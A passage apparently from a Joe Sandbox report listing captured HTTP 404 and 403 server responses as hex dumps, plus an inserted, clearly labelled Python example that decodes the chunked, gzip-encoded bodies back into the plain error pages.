            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 02:51:59 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 02:52:02 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Mon, 09 Sep 2024 02:52:04 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
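Added example, not part of the Joe Sandbox report: the three 404 replies above are chunked and gzip-encoded, so the report's "Data Ascii" column shows them as binary noise, while the fourth reply is sent uncompressed with Content-Length 601. The gzip trailer of the first compressed reply (its last four bytes, 59 02 00 00, little-endian) records an original length of 0x259 = 601 bytes as well. This Python block, written for this page rather than taken from Joe Security, turns a "Data Raw" hex dump back into the body by undoing the transfer coding and then the content coding the headers declare; the hex and header values are copied from the first gzip reply, and the function names are this example's own.

```python
"""
Added example, not part of the Joe Sandbox report: recover the readable body
of a captured HTTP response from the report's "Data Raw" hex dump by undoing
the transfer coding (chunked) and content coding (gzip/deflate) its headers
declare. Hex and header values are copied from the first gzip 404 reply above;
the function names are this example's own.
"""
import gzip
import zlib

# Headers of the first gzip-encoded 404 reply above, as captured.
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Transfer-Encoding": "chunked",
    "Connection": "close",
    "Server": "Apache",
    "Content-Encoding": "gzip",
}

# "Data Raw" of that reply: one 0x173-byte chunk holding a gzip stream, then the
# terminating zero-length chunk.
SAMPLE_DATA_RAW = """
31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef
57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a
94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d
a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af
20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83
76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b
43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01
71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b
93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae
41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86
5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef
a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac
b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8
4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1
c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74
eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
"""


def hexdump_to_bytes(dump: str) -> bytes:
    """Parse the report's space-separated hex ("31 37 33 0d 0a ...") into bytes."""
    return bytes(int(tok, 16) for tok in dump.split())


def dechunk(data: bytes) -> bytes:
    """Undo chunked transfer coding: <hex size>CRLF<bytes>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)
        size = int(data[pos:line_end].split(b";", 1)[0], 16)  # drop chunk extensions
        if size == 0:
            return bytes(out)
        start = line_end + 2
        out += data[start:start + size]
        if data[start + size:start + size + 2] != b"\r\n":
            raise ValueError(f"chunk at offset {start} not terminated by CRLF")
        pos = start + size + 2


def decode_body(headers: dict, raw: bytes) -> bytes:
    """Apply the codings the headers declare: transfer coding first, then content coding."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    if "chunked" in h.get("transfer-encoding", ""):
        raw = dechunk(raw)
    coding = h.get("content-encoding", "identity")
    if coding == "gzip":
        raw = gzip.decompress(raw)  # also verifies the CRC32/ISIZE trailer
    elif coding == "deflate":
        raw = zlib.decompress(raw, zlib.MAX_WBITS | 32)  # zlib- or gzip-wrapped deflate
    elif coding != "identity":
        raise ValueError("unsupported Content-Encoding: " + coding)
    return raw


def readable_body(headers: dict, data_raw: str) -> str:
    """Hex dump in, text out (undecodable bytes are replaced rather than hidden)."""
    return decode_body(headers, hexdump_to_bytes(data_raw)).decode("utf-8", "replace")


if __name__ == "__main__":
    print(readable_body(SAMPLE_HEADERS, SAMPLE_DATA_RAW))
```

Because `gzip.decompress` checks the CRC32 and ISIZE trailer, a hex dump that was truncated or mis-copied fails loudly instead of yielding a partial page; for a truncated dump (as with the longer responses further down, whose hex is cut off in the report) there is nothing to recover beyond what the chunked framing already exposes.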
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx/1.14.1
                Date: Mon, 09 Sep 2024 02:52:10 GMT
                Content-Length: 0
                Connection: close
                X-Rate-Limit-Limit: 5s
                X-Rate-Limit-Remaining: 19
                X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx/1.14.1
                Date: Mon, 09 Sep 2024 02:52:13 GMT
                Content-Length: 0
                Connection: close
                X-Rate-Limit-Limit: 5s
                X-Rate-Limit-Remaining: 18
                X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx/1.14.1
                Date: Mon, 09 Sep 2024 02:52:15 GMT
                Content-Length: 0
                Connection: close
                X-Rate-Limit-Limit: 5s
                X-Rate-Limit-Remaining: 19
                X-Rate-Limit-Reset: 2024-09-09T02:52:20.7881459Z
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx/1.14.1
                Date: Mon, 09 Sep 2024 02:52:18 GMT
                Content-Length: 0
                Connection: close
                X-Rate-Limit-Limit: 5s
                X-Rate-Limit-Remaining: 19
                X-Rate-Limit-Reset: 2024-09-09T02:52:23.4310316Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:52:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:52:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:52:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Sep 2024 02:52:46 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/plain; charset=utf-8 | Date: Mon, 09 Sep 2024 02:53:32 GMT | Content-Length: 11 | Connection: close | Data Raw: 42 61 64 20 52 65 71 75 65 73 74 | Data Ascii: Bad Request
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/plain; charset=utf-8 | Date: Mon, 09 Sep 2024 02:53:34 GMT | Content-Length: 11 | Connection: close | Data Raw: 42 61 64 20 52 65 71 75 65 73 74 | Data Ascii: Bad Request
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/plain; charset=utf-8 | Date: Mon, 09 Sep 2024 02:53:39 GMT | Content-Length: 11 | Connection: close | Data Raw: 42 61 64 20 52 65 71 75 65 73 74 | Data Ascii: Bad Request
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 09 Sep 2024 02:54:16 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 09 Sep 2024 02:54:18 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 09 Sep 2024 02:54:21 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
